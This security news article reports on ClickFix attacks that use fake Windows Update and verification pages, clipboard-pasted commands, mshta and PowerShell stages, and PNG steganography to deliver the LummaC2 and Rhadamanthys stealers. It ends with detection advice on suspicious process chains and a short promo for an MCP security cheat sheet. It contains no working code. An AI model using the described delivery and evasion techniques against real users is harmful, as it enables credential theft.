Recent observations have highlighted the emergence of ClickFix attack variants, where cybercriminals employ sophisticated tactics to deceive users. By presenting a convincing Windows Update animation on a full-screen browser page, these attackers conceal malicious code within images, leading unsuspecting individuals to execute harmful commands.
Fullscreen browser page
Since the beginning of October, security researchers have documented instances of ClickFix attacks that leverage the guise of installing critical Windows security updates, alongside the more prevalent “human verification” lure. Victims are directed to follow specific key sequences that inadvertently paste and execute commands from the attackers, with the malicious code being copied to the clipboard through JavaScript running on the fraudulent site.
Source: BleepingComputer
A report from Huntress, a managed security services provider, reveals that these new ClickFix variants deploy the LummaC2 and Rhadamanthys information stealers. In one variant, a human verification page is utilized, while another relies on the deceptive Windows Update screen. In both scenarios, the attackers employ steganography to embed the final malware payload within an image file.
According to Huntress researchers, instead of merely appending malicious data to a file, the attackers encode the harmful code directly within the pixel data of PNG images, utilizing specific color channels to reconstruct and decrypt the payload in memory. The delivery of the final payload begins with the execution of malicious JavaScript code via the mshta Windows-native binary.
This intricate process unfolds in multiple stages, incorporating PowerShell code and a .NET assembly known as the Stego Loader, which is tasked with reconstructing the final payload embedded within an encrypted PNG file. Within the Stego Loader’s manifest resources lies an AES-encrypted blob that serves as a steganographic PNG file containing shellcode, reconstructed using custom C# code.
Researchers have identified a dynamic evasion tactic employed by the threat actor, referred to as ctrampoline, where the entry point function initiates calls to 10,000 empty functions, further complicating detection efforts.
Source: Huntress
The shellcode, which harbors the infostealer samples, is extracted from the encrypted image and packed using the Donut tool, enabling the execution of VBScript, JScript, EXE, DLL files, and .NET assemblies directly in memory. Following the unpacking process, Huntress researchers successfully retrieved the malware, specifically the LummaC2 and Rhadamanthys variants, during their analysis of the attacks.
Visual representations of the attack process illustrate the complexity and sophistication of these ClickFix variants.
Source: Huntress
The Rhadamanthys variant, which employed the Windows Update lure, was first detected by researchers in October, prior to a significant law enforcement operation known as Operation Endgame that dismantled parts of its infrastructure on November 13. Following this operation, Huntress reports that the payload is no longer being delivered through the fake Windows Update domains, although these domains remain active.
To mitigate the risks associated with ClickFix attacks, researchers advise disabling the Windows Run box and keeping a vigilant eye on suspicious process chains, such as explorer.exe spawning mshta.exe or PowerShell. Additionally, cybersecurity analysts investigating incidents can examine the RunMRU registry key to determine if users have entered any commands in the Windows Run box.
As the Model Context Protocol (MCP) gains traction as the standard for connecting large language models to tools and data, security teams are rapidly adapting to safeguard these emerging services. A complimentary cheat sheet detailing seven best practices is available for immediate implementation.
